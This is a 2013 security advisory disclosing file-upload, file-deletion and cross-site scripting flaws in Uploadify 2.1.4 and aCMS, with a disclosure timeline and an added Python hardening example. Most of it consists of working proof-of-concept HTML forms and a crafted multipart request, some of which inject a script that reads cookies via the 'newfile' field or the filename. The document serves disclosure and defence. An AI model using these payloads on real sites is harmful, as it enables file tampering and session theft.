SECURITYVULNS:DOC:29820
Oct 01, 2013 - 12:00 a.m.

AFU, AFD and XSS vulnerabilities in Uploadify

vulners.com

Hello 3APA3A!

These are Arbitrary File Uploading, Arbitrary File Deletion and Cross-Site Scripting vulnerabilities in Uploadify, particularly in the version used in aCMS (it looks like these developers use a modified version of Uploadify, but other developers may also use such a version).


Affected products:

Uploadify v2.1.4 and potentially other versions are vulnerable, in particular the version shipped with aCMS. Uploadify 3.x is not vulnerable.


Details:

Arbitrary File Uploading (WASC-31):

http://websecurity.com.ua/uploads/2013/Uploadify%20AFU.html

<body>
<form action="http://site/uploadify.php" method="post" enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="hidden" name="folder" value="/uploadify/">
<input type="submit" value="OK">
</form>
</body>

Arbitrary File Deletion (WASC-42):

http://websecurity.com.ua/uploads/2013/Uploadify%20AFD.html

<body>
<form action="http://site/uploadify.php" method="post" enctype="multipart/form-data">
<input type="file" name="test">
<input type="hidden" name="newfile" value="/full/path/uploadify/1">
<input type="submit" value="OK">
</form>
</body>

Cross-Site Scripting (WASC-08):

http://websecurity.com.ua/uploads/2013/Uploadify%20XSS.html

<body>
<form action="http://site/uploadify.php" method="post" enctype="multipart/form-data">
<input type="file" name="test">
<input type="hidden" name="newfile" value="<body onload=alert(document.cookie)>">
<input type="submit" value="OK">
</form>
</body>

http://websecurity.com.ua/uploads/2013/Uploadify%20XSS-2.html

<body>
<form action="http://site/uploadify.php" method="post" enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="hidden" name="folder" value="/uploadify">
<input type="submit" value="OK">
</form>
</body>

The second XSS attack (XSS-2) works on Linux/Unix systems, where angle brackets are permitted in file names, or on any system by spoofing the request headers.

With the following headers (to place the XSS payload in the file extension):

POST http://site/uploadify.php

-----------------------------240841995418756\r\n
Content-Disposition: form-data; name="Filedata"; filename="test.<body onload=with(document)alert(cookie)>"\r\n
Content-Type: application/octet-stream\r\n
\r\n
test\r\n
\r\n
-----------------------------240841995418756\r\n
Content-Disposition: form-data; name="folder"\r\n
\r\n
/uploadify\r\n
-----------------------------240841995418756--\r\n
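As an added illustration (not Uploadify's code, and in Python rather than the PHP of uploadify.php), here is how a handler can neutralize the three inputs abused above: the folder and newfile paths are confined to the upload root, and the file name is reduced to safe characters with an allow-listed extension before it is stored or echoed back. The allow-list, the function names and the throwaway upload root are assumptions.

```python
import html
import os
import re
import tempfile

# Constructed hardening example: the three client-controlled inputs named in the
# advisory (folder, newfile, the Filedata filename) are checked before use.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "pdf"}  # assumed allow-list
_UNSAFE = re.compile(r"[^A-Za-z0-9._-]")             # everything else becomes "_"

def confine(upload_root: str, user_path: str) -> str:
    """Resolve user_path under upload_root; refuse anything that escapes it."""
    base = os.path.realpath(upload_root)
    target = os.path.realpath(os.path.join(base, user_path.lstrip("/\\")))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes upload root")
    return target

def sanitize_filename(name: str) -> str:
    """Basename only, safe characters only (drops < > and quotes), allow-listed extension."""
    name = _UNSAFE.sub("_", os.path.basename(name.replace("\\", "/"))).strip("._")
    if "." not in name:
        raise ValueError("missing file name or extension")
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension not allowed: {ext}")
    return name

def handle_upload(upload_root: str, folder: str, filename: str, data: bytes) -> str:
    """Store data under upload_root/folder/filename and return an HTML-safe reply."""
    dest_dir = confine(upload_root, folder)
    safe_name = sanitize_filename(filename)
    os.makedirs(dest_dir, exist_ok=True)
    with open(os.path.join(dest_dir, safe_name), "wb") as fh:
        fh.write(data)
    return f"Uploaded: {html.escape(safe_name)}"  # escape before echoing any name

def handle_delete(upload_root: str, newfile: str) -> bool:
    """Delete only an existing regular file inside upload_root; absolute client paths are confined."""
    target = confine(upload_root, newfile)
    if not os.path.isfile(target):
        return False
    os.remove(target)
    return True

def new_upload_root() -> str:
    """Throwaway upload directory (assumed) for trying the handlers locally."""
    return tempfile.mkdtemp(prefix="uploads-")
```

A folder of `../../outside` or a newfile of `/full/path/uploadify/1` never leaves the upload root, and a filename whose extension carries markup is refused rather than written and reflected.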


Timeline:

2013.03.04 - informed developers of aCMS about part of the vulnerabilities.
2013.04.03 - informed developers of aCMS about another part of the vulnerabilities.
2013.04.07 - informed developers of aCMS about another part of the vulnerabilities.
2013.05.25 - informed developers of aCMS about another part of the vulnerabilities.
2013.05.26 - informed developers of aCMS about another part of the vulnerabilities.
In all cases the developers just ignored all messages sent via different e-mails and the contact form.
2013.06.12 - announced at my site.
2013.06.22 - informed developers of Uploadify.
2013.09.12 - disclosed at my site (http://websecurity.com.ua/6566/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua